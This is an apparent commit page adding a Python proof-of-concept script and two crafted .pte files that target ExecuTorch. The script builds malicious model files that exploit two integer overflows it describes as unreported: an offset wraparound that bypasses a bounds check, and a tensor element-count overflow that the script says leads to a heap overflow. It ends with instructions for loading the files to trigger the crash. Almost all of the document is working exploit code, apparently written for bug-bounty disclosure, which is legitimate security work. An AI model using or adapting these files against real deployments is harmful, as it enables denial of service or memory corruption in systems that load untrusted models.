hackthesoul commited on
Commit
1080f89
·
1 Parent(s): 07afc9c

ExecuTorch integer overflow PoC

Browse files
malicious_numel_overflow.pte ADDED
Binary file (4.38 kB). View file
 
malicious_offset_overflow.pte ADDED
Binary file (4.38 kB). View file
 
poc_build_malicious_pte.py ADDED
@@ -0,0 +1,276 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #!/usr/bin/env python3
2
+ """
3
+ ExecuTorch .pte Integer Overflow PoC — Builds malicious .pte and triggers crash
4
+
5
+ CVE: NEW (unreported)
6
+ CWE-190: Integer Overflow or Wraparound
7
+ Affected: ExecuTorch (all versions using runtime/executor/program.cpp)
8
+
9
+ Vulnerability 1: program.cpp:592
10
+ offset (uint64 from flatbuffer) + size (size_t) overflows, bypassing bounds check.
11
+
12
+ Vulnerability 2: program_validation.cpp:48-79
13
+ Integer overflow checks for tensor numel are COMMENTED OUT.
14
+ """
15
+
16
+ import struct
17
+ import sys
18
+ import os
19
+
20
+ sys.path.insert(0, os.path.join(os.path.dirname(__file__), "gen"))
21
+
22
+ import flatbuffers
23
+ from flatbuffers import builder as fb_builder
24
+ from executorch_flatbuffer import (
25
+ Program, ExecutionPlan, DataSegment, SubsegmentOffsets,
26
+ Tensor, EValue, KernelTypes, Operator, Chain, Instruction,
27
+ Buffer, AllocationDetails, ExtraTensorInfo,
28
+ )
29
+ from executorch_flatbuffer import ScalarType as ST
30
+
31
+ SEGMENT_DATA_SIZE = 256 # Small segment
32
+
33
+ def build_overflow_pte(output_path):
34
+ """Build .pte with integer overflow in SubsegmentOffsets."""
35
+ b = fb_builder.Builder(4096)
36
+
37
+ # Overflow offset: when added to tensor nbytes (e.g. 64),
38
+ # wraps around to <= segment size
39
+ TENSOR_NBYTES = 64 # 4x4 float32
40
+ OVERFLOW_OFFSET = (1 << 64) - TENSOR_NBYTES # + 64 = 2^64 = wraps to 0
41
+
42
+ # --- SubsegmentOffsets for mutable_data_segments ---
43
+ SubsegmentOffsets.SubsegmentOffsetsStartOffsetsVector(b, 2)
44
+ b.PrependUint64(OVERFLOW_OFFSET) # index 1: MALICIOUS offset
45
+ b.PrependUint64(0) # index 0: reserved
46
+ offsets_vec = b.EndVector()
47
+
48
+ SubsegmentOffsets.SubsegmentOffsetsStart(b)
49
+ SubsegmentOffsets.SubsegmentOffsetsAddSegmentIndex(b, 0)
50
+ SubsegmentOffsets.SubsegmentOffsetsAddOffsets(b, offsets_vec)
51
+ mutable_seg = SubsegmentOffsets.SubsegmentOffsetsEnd(b)
52
+
53
+ # mutable_data_segments vector
54
+ Program.ProgramStartMutableDataSegmentsVector(b, 1)
55
+ b.PrependUOffsetTRelative(mutable_seg)
56
+ mutable_segs_vec = b.EndVector()
57
+
58
+ # --- DataSegment ---
59
+ DataSegment.DataSegmentStart(b)
60
+ DataSegment.DataSegmentAddOffset(b, 0)
61
+ DataSegment.DataSegmentAddSize(b, SEGMENT_DATA_SIZE)
62
+ segment = DataSegment.DataSegmentEnd(b)
63
+
64
+ Program.ProgramStartSegmentsVector(b, 1)
65
+ b.PrependUOffsetTRelative(segment)
66
+ segments_vec = b.EndVector()
67
+
68
+ # --- Tensor with mutable data pointing to overflow offset ---
69
+ # sizes = [4, 4], scalar_type = FLOAT (6), data_buffer_idx = 1
70
+ Tensor.TensorStartSizesVector(b, 2)
71
+ b.PrependInt32(4)
72
+ b.PrependInt32(4)
73
+ sizes_vec = b.EndVector()
74
+
75
+ Tensor.TensorStartDimOrderVector(b, 2)
76
+ b.PrependUint8(1)
77
+ b.PrependUint8(0)
78
+ dim_order_vec = b.EndVector()
79
+
80
+ # AllocationDetails for mutable tensor
81
+ AllocationDetails.AllocationDetailsStart(b)
82
+ AllocationDetails.AllocationDetailsAddMemoryId(b, 1)
83
+ AllocationDetails.AllocationDetailsAddMemoryOffsetLow(b, 0)
84
+ alloc_info = AllocationDetails.AllocationDetailsEnd(b)
85
+
86
+ Tensor.TensorStart(b)
87
+ Tensor.TensorAddScalarType(b, 6) # FLOAT
88
+ Tensor.TensorAddStorageOffset(b, 0)
89
+ Tensor.TensorAddSizes(b, sizes_vec)
90
+ Tensor.TensorAddDimOrder(b, dim_order_vec)
91
+ Tensor.TensorAddDataBufferIdx(b, 1) # Points to mutable data
92
+ Tensor.TensorAddAllocationInfo(b, alloc_info)
93
+ tensor = Tensor.TensorEnd(b)
94
+
95
+ # EValue wrapping the tensor
96
+ EValue.EValueStart(b)
97
+ EValue.EValueAddValType(b, KernelTypes.KernelTypes.Tensor)
98
+ EValue.EValueAddVal(b, tensor)
99
+ evalue = EValue.EValueEnd(b)
100
+
101
+ ExecutionPlan.ExecutionPlanStartValuesVector(b, 1)
102
+ b.PrependUOffsetTRelative(evalue)
103
+ values_vec = b.EndVector()
104
+
105
+ # Minimal ExecutionPlan
106
+ plan_name = b.CreateString("forward")
107
+ ExecutionPlan.ExecutionPlanStart(b)
108
+ ExecutionPlan.ExecutionPlanAddName(b, plan_name)
109
+ ExecutionPlan.ExecutionPlanAddValues(b, values_vec)
110
+ plan = ExecutionPlan.ExecutionPlanEnd(b)
111
+
112
+ Program.ProgramStartExecutionPlanVector(b, 1)
113
+ b.PrependUOffsetTRelative(plan)
114
+ plans_vec = b.EndVector()
115
+
116
+ # --- Build Program ---
117
+ Program.ProgramStart(b)
118
+ Program.ProgramAddVersion(b, 0)
119
+ Program.ProgramAddExecutionPlan(b, plans_vec)
120
+ Program.ProgramAddSegments(b, segments_vec)
121
+ Program.ProgramAddMutableDataSegments(b, mutable_segs_vec)
122
+ program = Program.ProgramEnd(b)
123
+
124
+ b.Finish(program, b"ET12")
125
+ buf = bytes(b.Output())
126
+
127
+ # Write .pte with extended header
128
+ with open(output_path, 'wb') as f:
129
+ f.write(buf)
130
+
131
+ # Pad to 4096 alignment for segment
132
+ padding = (4096 - len(buf) % 4096) % 4096
133
+ f.write(b'\x00' * padding)
134
+ segment_base = len(buf) + padding
135
+
136
+ # Write segment data
137
+ f.write(b'\x41' * SEGMENT_DATA_SIZE)
138
+
139
+ # Extended header (appended at end)
140
+ # Format: program_size(8) + segment_base_offset(8) + header_length(4) + magic(4)
141
+ eh = struct.pack('<QQ', len(buf), segment_base)
142
+ eh_with_header = struct.pack('<I', len(eh) + 8) + b'eh00' + eh
143
+ # Actually ExecuTorch extended header is at the END of file:
144
+ # Last 4 bytes: magic "eh00"
145
+ # Before that: header_length (4 bytes)
146
+ # Before that: program_size (8 bytes)
147
+ # Before that: segment_base_offset (8 bytes)
148
+ ext_header = struct.pack('<QQI', segment_base, len(buf), 24) + b'eh00'
149
+ f.write(ext_header)
150
+
151
+ file_size = os.path.getsize(output_path)
152
+ print(f"[+] Malicious .pte created: {output_path} ({file_size} bytes)")
153
+ print(f"[+] Flatbuffer size: {len(buf)} bytes")
154
+ print(f"[+] Segment base offset: {segment_base}")
155
+ print(f"[+] Overflow offset in SubsegmentOffsets: 0x{OVERFLOW_OFFSET:016X}")
156
+ print(f"[+] When loading 64-byte tensor:")
157
+ print(f" offset=0x{OVERFLOW_OFFSET:016X} + size=64 = 0x{(OVERFLOW_OFFSET + 64) % (1 << 64):016X} (WRAPS TO 0)")
158
+ print(f" 0 <= segment_size({SEGMENT_DATA_SIZE}) -> bounds check PASSES")
159
+ print(f" load_into() called with OOB offset -> CRASH / OOB READ")
160
+
161
+ return output_path
162
+
163
+
164
+ def build_numel_overflow_pte(output_path):
165
+ """Build .pte with tensor dimension overflow (commented-out checks)."""
166
+ b = fb_builder.Builder(4096)
167
+
168
+ # Tensor with dimensions that overflow when multiplied
169
+ # sizes = [0x7FFFFFFF, 0x7FFFFFFF] -> numel overflows int32/int64
170
+ # Since validate_tensor() overflow checks are commented out, this passes
171
+
172
+ # DataSegment
173
+ DataSegment.DataSegmentStart(b)
174
+ DataSegment.DataSegmentAddOffset(b, 0)
175
+ DataSegment.DataSegmentAddSize(b, 256)
176
+ segment = DataSegment.DataSegmentEnd(b)
177
+
178
+ Program.ProgramStartSegmentsVector(b, 1)
179
+ b.PrependUOffsetTRelative(segment)
180
+ segments_vec = b.EndVector()
181
+
182
+ # Overflow tensor sizes
183
+ Tensor.TensorStartSizesVector(b, 2)
184
+ b.PrependInt32(0x7FFFFFFF) # 2147483647
185
+ b.PrependInt32(0x7FFFFFFF) # 2147483647
186
+ sizes_vec = b.EndVector() # numel = 2147483647^2 = overflows!
187
+
188
+ Tensor.TensorStartDimOrderVector(b, 2)
189
+ b.PrependUint8(1)
190
+ b.PrependUint8(0)
191
+ dim_order_vec = b.EndVector()
192
+
193
+ Tensor.TensorStart(b)
194
+ Tensor.TensorAddScalarType(b, 6) # FLOAT
195
+ Tensor.TensorAddSizes(b, sizes_vec)
196
+ Tensor.TensorAddDimOrder(b, dim_order_vec)
197
+ Tensor.TensorAddDataBufferIdx(b, 0)
198
+ tensor = Tensor.TensorEnd(b)
199
+
200
+ EValue.EValueStart(b)
201
+ EValue.EValueAddValType(b, KernelTypes.KernelTypes.Tensor)
202
+ EValue.EValueAddVal(b, tensor)
203
+ evalue = EValue.EValueEnd(b)
204
+
205
+ ExecutionPlan.ExecutionPlanStartValuesVector(b, 1)
206
+ b.PrependUOffsetTRelative(evalue)
207
+ values_vec = b.EndVector()
208
+
209
+ plan_name = b.CreateString("forward")
210
+ ExecutionPlan.ExecutionPlanStart(b)
211
+ ExecutionPlan.ExecutionPlanAddName(b, plan_name)
212
+ ExecutionPlan.ExecutionPlanAddValues(b, values_vec)
213
+ plan = ExecutionPlan.ExecutionPlanEnd(b)
214
+
215
+ Program.ProgramStartExecutionPlanVector(b, 1)
216
+ b.PrependUOffsetTRelative(plan)
217
+ plans_vec = b.EndVector()
218
+
219
+ Program.ProgramStart(b)
220
+ Program.ProgramAddVersion(b, 0)
221
+ Program.ProgramAddExecutionPlan(b, plans_vec)
222
+ Program.ProgramAddSegments(b, segments_vec)
223
+ program = Program.ProgramEnd(b)
224
+
225
+ b.Finish(program, b"ET12")
226
+ buf = bytes(b.Output())
227
+
228
+ with open(output_path, 'wb') as f:
229
+ f.write(buf)
230
+ padding = (4096 - len(buf) % 4096) % 4096
231
+ f.write(b'\x00' * padding)
232
+ seg_base = len(buf) + padding
233
+ f.write(b'\x42' * 256)
234
+ ext_header = struct.pack('<QQI', seg_base, len(buf), 24) + b'eh00'
235
+ f.write(ext_header)
236
+
237
+ file_size = os.path.getsize(output_path)
238
+ print(f"\n[+] Numel overflow .pte: {output_path} ({file_size} bytes)")
239
+ print(f"[+] Tensor sizes: [2147483647, 2147483647]")
240
+ print(f"[+] numel = 2147483647 * 2147483647 = {0x7FFFFFFF * 0x7FFFFFFF} (overflows int64!)")
241
+ print(f"[+] validate_tensor() overflow check is COMMENTED OUT -> passes")
242
+ print(f"[+] Allocates tiny buffer, copies huge data -> HEAP OVERFLOW")
243
+
244
+
245
+ if __name__ == "__main__":
246
+ poc_dir = os.path.expanduser("~/bugbounty_results/executorch/poc")
247
+
248
+ print("=" * 70)
249
+ print("ExecuTorch Integer Overflow PoC Generator")
250
+ print("=" * 70)
251
+ print()
252
+
253
+ # PoC 1: SubsegmentOffsets overflow
254
+ pte1 = build_overflow_pte(os.path.join(poc_dir, "malicious_offset_overflow.pte"))
255
+
256
+ # PoC 2: Tensor numel overflow
257
+ pte2 = build_numel_overflow_pte(os.path.join(poc_dir, "malicious_numel_overflow.pte"))
258
+
259
+ print()
260
+ print("=" * 70)
261
+ print("VERIFICATION")
262
+ print("=" * 70)
263
+ print()
264
+ print("To verify the crash, load the .pte with ExecuTorch C++ runtime:")
265
+ print()
266
+ print(" #include <executorch/runtime/executor/program.h>")
267
+ print(" auto program = Program::load(\"malicious_offset_overflow.pte\");")
268
+ print(" auto method = program->load_method(\"forward\");")
269
+ print(" // -> Triggers OOB read in load_mutable_subsegment_into()")
270
+ print()
271
+ print("Or with Python:")
272
+ print()
273
+ print(" from executorch.runtime import Runtime, Program")
274
+ print(" program = Program('malicious_offset_overflow.pte')")
275
+ print(" method = program.load_method('forward')")
276
+ print(" // -> SIGSEGV or SIGBUS")